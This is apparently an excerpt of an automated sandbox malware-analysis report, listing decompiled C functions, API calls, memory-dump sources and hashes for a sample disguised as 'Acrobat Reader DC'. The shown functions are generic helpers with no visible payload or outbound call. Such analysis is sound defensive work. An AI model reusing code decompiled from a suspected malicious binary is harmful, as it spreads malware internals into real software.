                                  											if(_t108 != 0) {
                                  												continue;
                                  											} else {
                                  												_t109 = _a4;
                                  												 *_t109 = _t140;
                                  												return _t109 | 0xffffffff;
                                  											}
                                  											goto L107;
                                  										}
                                  										goto L101;
                                  									}
                                  								}
                                  							} else {
                                  								_t140 =  &(_t140[3]);
                                  								_v8 = _t140;
                                  								_v16 = 1;
                                  								goto L35;
                                  							}
                                  						} else {
                                  							_t88 = _t82 + 1;
                                  							 *_t111 = _t88;
                                  							if(_t138 != 0 || _t88 != _a16) {
                                  								L17:
                                  								_t140 =  &(_t140[1]);
                                  								_v8 = _t140;
                                  								goto L35;
                                  							} else {
                                  								L106:
                                  								return _t88;
                                  							}
                                  						}
                                  					} else {
                                  						_t140 =  &(_t140[2]);
                                  						_v8 = _t140;
                                  						goto L35;
                                  					}
                                  				}
                                  				L107:
                                  			}
                                  0x00000000
                                  0x0042f6cb
                                  0x0042f6c9
                                  0x0042f6c1
                                  0x0042f5fc
                                  0x0042f5fc
                                  0x0042f5fd
                                  0x0042f600
                                  0x0042f604
                                  0x00000000
                                  0x0042f60a
                                  0x0042f60a
                                  0x0042f60a
                                  0x0042f60f
                                  0x0042f647
                                  0x0042f651
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f611
                                  0x0042f611
                                  0x0042f616
                                  0x0042f665
                                  0x0042f665
                                  0x0042f66a
                                  0x0042f66d
                                  0x0042f679
                                  0x0042f679
                                  0x0042f67a
                                  0x0042f682
                                  0x0042f679
                                  0x00000000
                                  0x0042f618
                                  0x0042f61c
                                  0x0042f623
                                  0x0042f628
                                  0x0042f62d
                                  0x00000000
                                  0x0042f62f
                                  0x0042f62f
                                  0x0042f632
                                  0x0042f636
                                  0x0042f63c
                                  0x00000000
                                  0x0042f642
                                  0x00000000
                                  0x0042f642
                                  0x0042f63c
                                  0x0042f62d
                                  0x0042f616
                                  0x00000000
                                  0x0042f687
                                  0x0042f687
                                  0x0042f689
                                  0x0042f691
                                  0x0042f695
                                  0x0042f69f
                                  0x0042f69f
                                  0x0042f604
                                  0x0042f533
                                  0x0042f533
                                  0x0042f535
                                  0x0042f535
                                  0x0042f535
                                  0x0042f53a
                                  0x00000000
                                  0x00000000
                                  0x0042f53c
                                  0x0042f542
                                  0x0042f551
                                  0x0042f556
                                  0x0042f559
                                  0x0042f55e
                                  0x0042f560
                                  0x0042f563
                                  0x00000000
                                  0x0042f563
                                  0x0042f544
                                  0x0042f544
                                  0x00000000
                                  0x0042f544
                                  0x0042f57b
                                  0x0042f57f
                                  0x0042f58a
                                  0x0042f58a
                                  0x0042f58b
                                  0x0042f58c
                                  0x0042f58f
                                  0x0042f593
                                  0x00000000
                                  0x0042f599
                                  0x0042f599
                                  0x0042f5a3
                                  0x0042f5da
                                  0x0042f5da
                                  0x0042f5db
                                  0x0042f5de
                                  0x0042f5e2
                                  0x00000000
                                  0x0042f5e4
                                  0x00000000
                                  0x0042f5e4
                                  0x0042f5a5
                                  0x0042f5a5
                                  0x0042f5a6
                                  0x0042f5a9
                                  0x0042f5ad
                                  0x00000000
                                  0x0042f5b3
                                  0x0042f5b5
                                  0x00000000
                                  0x0042f5b7
                                  0x0042f5b7
                                  0x0042f5b7
                                  0x0042f5b8
                                  0x0042f5bb
                                  0x0042f5bf
                                  0x00000000
                                  0x00000000
                                  0x0042f5c7
                                  0x00000000
                                  0x0042f5c9
                                  0x0042f5cb
                                  0x00000000
                                  0x0042f5d1
                                  0x0042f5d1
                                  0x0042f5d2
                                  0x0042f5d8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f5d8
                                  0x0042f5cb
                                  0x00000000
                                  0x0042f5c7
                                  0x00000000
                                  0x0042f5b7
                                  0x0042f5b5
                                  0x0042f5ad
                                  0x00000000
                                  0x0042f5a3
                                  0x00000000
                                  0x0042f599
                                  0x00000000
                                  0x0042f593
                                  0x0042f56a
                                  0x0042f570
                                  0x0042f571
                                  0x0042f576
                                  0x00000000
                                  0x0042f576
                                  0x00000000
                                  0x0042f56a
                                  0x00000000
                                  0x0042f52d
                                  0x0042f4dd
                                  0x0042f3a4
                                  0x0042f3a4
                                  0x0042f3aa
                                  0x0042f718
                                  0x0042f3bb
                                  0x0042f3c1
                                  0x0042f3d8
                                  0x0042f40b
                                  0x0042f40e
                                  0x0042f414
                                  0x0042f452
                                  0x0042f454
                                  0x0042f455
                                  0x0042f455
                                  0x0042f458
                                  0x0042f45d
                                  0x0042f46c
                                  0x0042f46f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f45f
                                  0x0042f45f
                                  0x0042f465
                                  0x00000000
                                  0x0042f471
                                  0x0042f471
                                  0x0042f471
                                  0x0042f472
                                  0x0042f476
                                  0x0042f481
                                  0x0042f484
                                  0x0042f485
                                  0x0042f48b
                                  0x0042f48d
                                  0x0042f48d
                                  0x0042f495
                                  0x0042f499
                                  0x0042f49b
                                  0x0042f49c
                                  0x0042f4a2
                                  0x0042f4a8
                                  0x00000000
                                  0x0042f4b3
                                  0x0042f4b9
                                  0x0042f4be
                                  0x0042f4c3
                                  0x0042f4ce
                                  0x00000000
                                  0x0042f4c5
                                  0x0042f4cd
                                  0x0042f4cd
                                  0x0042f4c3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f476
                                  0x0042f465
                                  0x0042f416
                                  0x0042f41a
                                  0x0042f420
                                  0x0042f424
                                  0x0042f42a
                                  0x0042f42e
                                  0x0042f42f
                                  0x0042f432
                                  0x0042f436
                                  0x00000000
                                  0x00000000
                                  0x0042f438
                                  0x00000000
                                  0x0042f436
                                  0x0042f440
                                  0x00000000
                                  0x00000000
                                  0x0042f440
                                  0x0042f424
                                  0x00000000
                                  0x0042f41a
                                  0x0042f3da
                                  0x0042f3da
                                  0x0042f3dd
                                  0x0042f3e0
                                  0x0042f3e4
                                  0x0042f706
                                  0x0042f706
                                  0x0042f709
                                  0x0042f70d
                                  0x0042f714
                                  0x0042f3ea
                                  0x0042f3ea
                                  0x0042f3f2
                                  0x0042f3f3
                                  0x0042f3f6
                                  0x0042f3fa
                                  0x00000000
                                  0x0042f3fc
                                  0x0042f3fc
                                  0x0042f400
                                  0x0042f40a
                                  0x0042f40a
                                  0x00000000
                                  0x0042f3fa
                                  0x00000000
                                  0x0042f3ea
                                  0x0042f3e4
                                  0x0042f3c3
                                  0x0042f3c3
                                  0x0042f3c6
                                  0x0042f3c9
                                  0x00000000
                                  0x0042f3c9
                                  0x0042f71e
                                  0x0042f71e
                                  0x0042f71f
                                  0x0042f723
                                  0x0042f446
                                  0x0042f446
                                  0x0042f447
                                  0x00000000
                                  0x0042f738
                                  0x0042f738
                                  0x0042f738
                                  0x0042f738
                                  0x0042f723
                                  0x0042f3b0
                                  0x0042f3b0
                                  0x0042f3b3
                                  0x00000000
                                  0x0042f3b3
                                  0x0042f3aa
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _strncmp
                                  • String ID: Q\E
                                  • API String ID: 909875538-2189900498
                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E004440E0(int _a4, intOrPtr* _a8, int _a12) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				void* __edi;
                                  				void* __esi;
                                  				int _t28;
                                  				signed int _t30;
                                  				intOrPtr _t34;
                                  				signed int _t35;
                                  				signed int _t38;
                                  				int _t42;
                                  				struct HMENU__* _t52;
                                  				signed int* _t55;
                                  
                                  				_t28 = _a4;
                                  				_t55 = _a12;
                                  				_a12 = 0xffffffff;
                                  				if(_t28 == 5 || _t28 == 6) {
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					if(_t28 == 3 || _t28 == 4) {
                                  						_t42 = _t28;
                                  						goto L8;
                                  					} else {
                                  						if(E00434179(0x4a8710, _t28,  &_a12) != 0) {
                                  							_t42 = _a12;
                                  							L8:
                                  							_t30 =  *(0x4a88c4 + _t42 * 4);
                                  							 *_t55 = 0;
                                  							__eflags = _t30;
                                  							if(_t30 == 0) {
                                  								goto L5;
                                  							} else {
                                  								_t52 =  *_t30;
                                  								_v52.cbSize = 0x30;
                                  								E00412F40( &(_v52.fMask), 0, 0x2c);
                                  								__eflags = _t52;
                                  								if(__eflags == 0) {
                                  									L24:
                                  									__eflags = 0;
                                  									return 0;
                                  								} else {
                                  									_push(0x208);
                                  									_t34 = E004115D7(_t52, _t55, __eflags);
                                  									 *_a8 = _t34;
                                  									_v52.fMask = 0x11;
                                  									_v52.dwTypeData = _t34;
                                  									_v52.cch = 0x104;
                                  									_t35 = GetMenuItemInfoW(_t52, _t42, 0,  &_v52);
                                  									__eflags = _t35;
                                  									if(_t35 == 0) {
                                  										L23:
                                  										_push( *_a8);
                                  										E004111DC();
                                  										goto L24;
                                  									} else {
                                  										__eflags = _v52.fType & 0x00000800;
                                  										if((_v52.fType & 0x00000800) != 0) {
                                  											goto L23;
                                  										} else {
                                  											_t38 = _v52.fState;
                                  											__eflags = _t38 & 0x00000003;
                                  											if((_t38 & 0x00000003) == 0) {
                                  												 *_t55 =  *_t55 | 0x00000040;
                                  												__eflags =  *_t55;
                                  											} else {
                                  												 *_t55 =  *_t55 | 0x00000080;
                                  											}
                                  											__eflags = _t38 & 0x00008080;
                                  											if((_t38 & 0x00008080) != 0) {
                                  												 *_t55 =  *_t55 | 0x00000100;
                                  												__eflags =  *_t55;
                                  											}
                                  											__eflags = _t38 & 0x00000008;
                                  											if((_t38 & 0x00000008) == 0) {
                                  												 *_t55 =  *_t55 | 0x00000004;
                                  												__eflags =  *_t55;
                                  											} else {
                                  												 *_t55 =  *_t55 | 0x00000001;
                                  											}
                                  											__eflags = _t38 & 0x00001000;
                                  											if((_t38 & 0x00001000) != 0) {
                                  												 *_t55 =  *_t55 | 0x00000200;
                                  												__eflags =  *_t55;
                                  											}
                                  											return 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							L5:
                                  							return 0;
                                  						}
                                  					}
                                  				}
                                  			}















                                  APIs
                                  • _memset.LIBCMT ref: 00444158
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00444193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu_memset
                                  • String ID: 0
                                  • API String ID: 2223754486-4108050209
                                  • Opcode ID: 01492e4d25bc2bd65c26aecb51fb71c87790512efaa9bc24c35de0538d27af29
                                  • Instruction ID: 58443bb6ec7987cf46203e674686192f5cc98237d9d33e2b35fa29f462c9b90c
                                  • Opcode Fuzzy Hash: 01492e4d25bc2bd65c26aecb51fb71c87790512efaa9bc24c35de0538d27af29
                                  • Instruction Fuzzy Hash: 9631E3715002049BF720CF58DC89BAAB7A8FB99310F14451FED41D62A0EBB99990CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044835A(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				int _v20;
                                  				int _v24;
                                  				intOrPtr _v32;
                                  				void _v48;
                                  				void _v92;
                                  				long _v96;
                                  				void* _v100;
                                  				intOrPtr _t46;
                                  				intOrPtr _t47;
                                  				long _t50;
                                  				struct HWND__** _t53;
                                  				long _t55;
                                  				intOrPtr _t59;
                                  				intOrPtr _t63;
                                  				intOrPtr _t67;
                                  				struct HWND__* _t68;
                                  				intOrPtr _t79;
                                  				struct HWND__* _t84;
                                  
                                  				if(E00441AF5(0x4a8630, _a16,  &_a16,  &_v8) != 0) {
                                  					_t63 =  *0x4a8690; // 0x0
                                  					_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + _a16 * 4))));
                                  					if( *((intOrPtr*)(_t59 + 0x1b0)) == 0) {
                                  						goto L1;
                                  					} else {
                                  						_t46 =  *((intOrPtr*)(_t59 + 0x1b8));
                                  						_v48 = 5;
                                  						if(_t46 >= 0 ||  *((intOrPtr*)(_t59 + 0x1bc)) >= 0) {
                                  							_v48 = 0x27;
                                  							_v24 = 0;
                                  							_v20 = 0;
                                  						}
                                  						if(_t46 >= 0) {
                                  							_v20 = _t46;
                                  						}
                                  						_t47 =  *((intOrPtr*)(_t59 + 0x1bc));
                                  						if(_t47 >= 0) {
                                  							_v24 = _t47;
                                  						}
                                  						_v12 = _a8;
                                  						_v32 = _a12;
                                  						memcpy( &_v92,  &_v48, 0xa << 2);
                                  						_t50 =  *(_t59 + 0x1b4);
                                  						_v96 = 0xffff0001;
                                  						if(_t50 != 0) {
                                  							_v96 = _t50;
                                  						}
                                  						_t67 =  *0x4a86a4; // 0xa71980
                                  						_t53 =  *( *(_t67 + _v8 * 4));
                                  						_t68 = _t53[0x22];
                                  						if(_t68 != 0x10) {
                                  							_t84 = _t53[0xc];
                                  						} else {
                                  							_t84 =  *_t53;
                                  						}
                                  						if(_t68 != 0x10) {
                                  							_v100 = _t53[3];
                                  						} else {
                                  							_v100 = 0xffff0000;
                                  						}
                                  						_t55 = SendMessageW(_t84, 0x1132, 0,  &_v100);
                                  						_t79 = _a4;
                                  						 *(_t79 + 0xc) = _t55;
                                  						 *(_t79 + 0x30) = _t84;
                                  						 *((short*)(_t79 + 0x80)) = SendMessageW(_t84, 0x1105, 0, 0);
                                  						 *(_t59 + 0x1b4) =  *(_t79 + 0xc);
                                  						return 1;
                                  					}
                                  				} else {
                                  					L1:
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: '
                                  • API String ID: 3850602802-1997036262
                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E0040BD80(void* __eax, signed int __ebx, intOrPtr* __ecx, void* __fp0, intOrPtr* _a4) {
                                  				intOrPtr _v8;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t38;
                                  				intOrPtr* _t39;
                                  				signed int _t40;
                                  				signed int _t41;
                                  				signed int _t42;
                                  				intOrPtr _t44;
                                  				signed int _t59;
                                  				void* _t80;
                                  				intOrPtr* _t83;
                                  				void* _t85;
                                  				void* _t86;
                                  				void* _t95;
                                  
                                  				_t95 = __fp0;
                                  				_t59 = __ebx;
                                  				_push(__ecx);
                                  				_t80 = __eax;
                                  				_t83 = __ecx;
                                  				if(__eax == 0) {
                                  					L7:
                                  					return _t83;
                                  				}
                                  				_t38 =  *((intOrPtr*)(_a4 + 4));
                                  				if(__ebx >= _t38) {
                                  					goto L7;
                                  				}
                                  				if(__eax != 0xffffffff) {
                                  					__eflags = __ebx + __eax - _t38;
                                  					if(__eflags <= 0) {
                                  						L4:
                                  						_t3 = _t83 + 0xc; // 0xd0558b1d
                                  						_t39 =  *_t3;
                                  						if( *_t39 > 1) {
                                  							 *_t39 =  *_t39 - 1;
                                  							_push(4);
                                  							_t40 = E004115D7(_t80, _t83, __eflags);
                                  							_t86 = _t85 + 4;
                                  							__eflags = _t40;
                                  							if(_t40 == 0) {
                                  								_t40 = 0;
                                  							} else {
                                  								 *_t40 = 1;
                                  							}
                                  							_t17 = _t83 + 4; // 0x74000049
                                  							 *(_t83 + 0xc) = _t40;
                                  							_t20 = _t80 + 1; // 0x7400004a
                                  							_t41 =  *_t17 + _t20;
                                  							 *(_t83 + 8) = _t41;
                                  							__eflags = _t41;
                                  							if(__eflags == 0) {
                                  								_t42 = 8;
                                  							} else {
                                  								_t42 = (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3);
                                  								__eflags = _t42;
                                  							}
                                  							 *(_t83 + 8) = _t42;
                                  							_push( ~(0 | __eflags > 0x00000000) | _t42 * 0x00000002);
                                  							_t44 = E004115D7(_t80, _t83, __eflags);
                                  							_t29 = _t83 + 4; // 0x74000049
                                  							_t31 =  *_t29 + 2; // 0x7400004b
                                  							_v8 = _t44;
                                  							E00410E60(_t44,  *_t83,  *_t29 + _t31);
                                  							_t85 = _t86 + 0x10;
                                  							 *_t83 = _v8;
                                  							L6:
                                  							_t6 = _t83 + 4; // 0x74000049
                                  							E00410E60( *_t83 +  *_t6 * 2,  *_a4 + _t59 * 2, _t80 + _t80);
                                  							 *(_t83 + 4) =  *(_t83 + 4) + _t80;
                                  							_t14 = _t83 + 4; // 0x74000049
                                  							 *((short*)( *_t83 +  *_t14 * 2)) = 0;
                                  							goto L7;
                                  						}
                                  						_t4 = _t83 + 4; // 0x74000049
                                  						E00402F00( *_t4 + _t80, _t83, _t95);
                                  						goto L6;
                                  					}
                                  				}
                                  				_t80 = _t38 - _t59;
                                  				goto L4;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  • Opcode ID: f964171bc22d0a42f16369dbad18f2cd434c0b18babede9fc6fedef28322a13d
                                  • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                  • Opcode Fuzzy Hash: f964171bc22d0a42f16369dbad18f2cd434c0b18babede9fc6fedef28322a13d
                                  • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00444006(int _a4, signed int _a8) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				signed int _t36;
                                  				int _t39;
                                  
                                  				_t29 = _a8;
                                  				_t39 = _a4;
                                  				_a8 = 0xffffffff;
                                  				if(_t39 != 0) {
                                  					if(_t39 == 5 || _t39 == 6) {
                                  						return 0;
                                  					} else {
                                  						if(_t39 == 3 || _t39 == 4) {
                                  							_t36 = _t39;
                                  							goto L10;
                                  						} else {
                                  							if(E00434179(0x4a8710, _t39,  &_a8) != 0) {
                                  								_t36 = _a8;
                                  								L10:
                                  								if( *(0x4a88c4 + _t36 * 4) == 0 || ( *(0x4a88c4 + _t36 * 4))[1] == 0) {
                                  									goto L7;
                                  								} else {
                                  									_v52.cbSize = 0x30;
                                  									E00412F40( &(_v52.fMask), 0, 0x2c);
                                  									_v52.fMask = 4;
                                  									if(GetMenuItemInfoW( *( *(0x4a88c4 + _t36 * 4)), _t39, 0,  &_v52) == 0) {
                                  										goto L7;
                                  									} else {
                                  										 *_t29 = _v52.hSubMenu;
                                  										return 1;
                                  									}
                                  								}
                                  							} else {
                                  								L7:
                                  								return 0;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t27 =  *0x4a8710; // 0x800d9
                                  					 *_t29 = _t27;
                                  					return _t39 + 1;
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 3577af1d957b7204fdd46e1a4f9341c5b1a9bc6f86c8f2c685067796396eaca7
                                  • Instruction ID: 69519e99fff9c3611eeaecbf8f45cf93f87690a028603bc06d4aa4e0618ad1d9
                                  • Opcode Fuzzy Hash: 3577af1d957b7204fdd46e1a4f9341c5b1a9bc6f86c8f2c685067796396eaca7
                                  • Instruction Fuzzy Hash: 92210D7290011457EB20DF4CEC84BEBB764F79A320F44412FEE5897290D779A854C7D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID: <local>
                                  • API String ID: 2038078732-4266983199
                                  • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                  • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0044CE43(void* __ecx, void* __eflags, char _a4) {
                                  				intOrPtr _v8;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t18;
                                  				signed int _t20;
                                  				void* _t27;
                                  				intOrPtr _t28;
                                  				void* _t34;
                                  				signed int _t35;
                                  				void* _t38;
                                  				signed int _t41;
                                  
                                  				_t28 =  *((intOrPtr*)(E00432520( &_a4) + 8));
                                  				_t18 = E00443106( &_a4);
                                  				_v8 = _t18;
                                  				_t20 = _t18 - 1 >> 2;
                                  				_t41 = (4 + _t20 * 4 >> 2) + 2;
                                  				__imp__#411(0x13, 0, _t41, _t34, _t38, _t27, __ecx);
                                  				_t35 = _t20;
                                  				if(_t35 == 0) {
                                  					E00408F40(_t35,  &_a4);
                                  					return 0;
                                  				} else {
                                  					_t8 = _t35 + 0x20; // 0x20
                                  					 *((intOrPtr*)(_t35 + 0x18)) = 0x73747263;
                                  					 *((intOrPtr*)(_t35 + 0x1c)) = _t28;
                                  					 *((intOrPtr*)(_t35 + 0x14 + _t41 * 4)) = 0;
                                  					E00410E60(_t8, _t28, _v8);
                                  					E00408F40(_t35,  &_a4);
                                  					return _t35;
                                  				}
                                  			}

                                  APIs
                                  • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 0044CE78
                                  • _memmove.LIBCMT ref: 0044CE9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayCreateSafeVector_memmove
                                  • String ID: crts
                                  • API String ID: 564309351-3724388283
                                  • Opcode ID: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
